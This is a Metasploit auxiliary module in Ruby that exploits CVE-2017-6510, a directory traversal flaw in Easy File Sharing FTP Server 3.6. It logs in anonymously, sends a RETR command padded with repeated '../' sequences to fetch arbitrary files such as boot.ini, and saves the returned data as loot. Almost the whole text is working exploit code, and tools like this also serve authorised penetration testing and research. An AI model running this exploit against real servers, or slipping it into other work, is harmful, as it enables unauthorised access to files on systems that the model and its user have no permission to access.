1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Auxiliary
7
  include Msf::Exploit::Remote::Ftp
8
  include Msf::Auxiliary::Report
9
  include Msf::Auxiliary::Scanner
10

11
  def initialize(info = {})
12
    super(
13
      update_info(
14
        info,
15
        'Name' => 'Easy File Sharing FTP Server 3.6 Directory Traversal',
16
        'Description' => %q{
17
          This module exploits a directory traversal vulnerability found in Easy File Sharing FTP Server Version 3.6 and Earlier.
18
          This vulnerability allows an attacker to download arbitrary files from the server by crafting
19
          a RETR command that includes file system traversal strings such as '../'
20
        },
21
        'Platform' => 'win',
22
        'Author' => [
23
          'Ahmed Elhady Mohamed' # @kingasmk ahmed.elhady.mohamed[at]gmail.com
24
        ],
25
        'License' => MSF_LICENSE,
26
        'References' => [
27
          [ 'CVE', '2017-6510']
28
        ],
29
        'DisclosureDate' => '2017-03-07',
30
        'Notes' => {
31
          'Reliability' => UNKNOWN_RELIABILITY,
32
          'Stability' => UNKNOWN_STABILITY,
33
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
34
        }
35
      )
36
    )
37

38
    register_options(
39
      [
40
        OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),
41
        OptString.new('PATH', [ true, "Path to the file to disclose, relative to the root dir.", 'boot.ini'])
42
      ]
43
    )
44
  end
45

46
  def check_host(ip)
47
    begin
48
      connect
49
      if /Easy File Sharing FTP Server/i === banner
50
        return Exploit::CheckCode::Detected
51
      end
52
    ensure
53
      disconnect
54
    end
55

56
    Exploit::CheckCode::Safe
57
  end
58

59
  def run_host(target_host)
60
    begin
61
      # Login anonymously and open the socket that we'll use for data retrieval.
62
      connect_login
63
      sock = data_connect
64
      if sock.nil?
65
        error_msg = 'data_connect failed; possible invalid response'
66
        print_status(error_msg)
67
        elog(error_msg)
68
      else
69
        file_path = datastore['PATH']
70
        file = ::File.basename(file_path)
71

72
        # make RETR request and store server response message...
73
        retr_cmd = ("../" * datastore['DEPTH']) + "#{file_path}"
74
        res = send_cmd(["RETR", retr_cmd])
75

76
        # read the file data from the socket that we opened
77
        # dont assume theres still a sock to read from. Per #7582
78
        if sock.nil?
79
          error_msg = 'data_connect failed; possible invalid response'
80
          print_status(error_msg)
81
          elog(error_msg)
82
          return
83
        else
84
          # read the file data from the socket that we opened
85
          response_data = sock.read(1024)
86
        end
87

88
        unless response_data
89
          print_error("#{file_path} not found")
90
          return
91
        end
92

93
        if response_data.length == 0 or !(res =~ /^150/)
94
          print_status("File (#{file_path})from #{peer} is empty...")
95
          return
96
        end
97

98
        # store file data to loot
99
        loot_file = store_loot("easy.file.sharing.ftp.data", "text", rhost, response_data, file, file_path)
100
        vprint_status("Data returned:\n")
101
        vprint_line(response_data)
102
        print_good("Stored #{file_path} to #{loot_file}")
103
      end
104
    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e
105
      vprint_error(e.message)
106
      elog(e)
107
    rescue ::Timeout::Error, ::Errno::EPIPE => e
108
      vprint_error(e.message)
109
      elog(e)
110
    ensure
111
      data_disconnect
112
      disconnect
113
    end
114
  end
115
end
116

117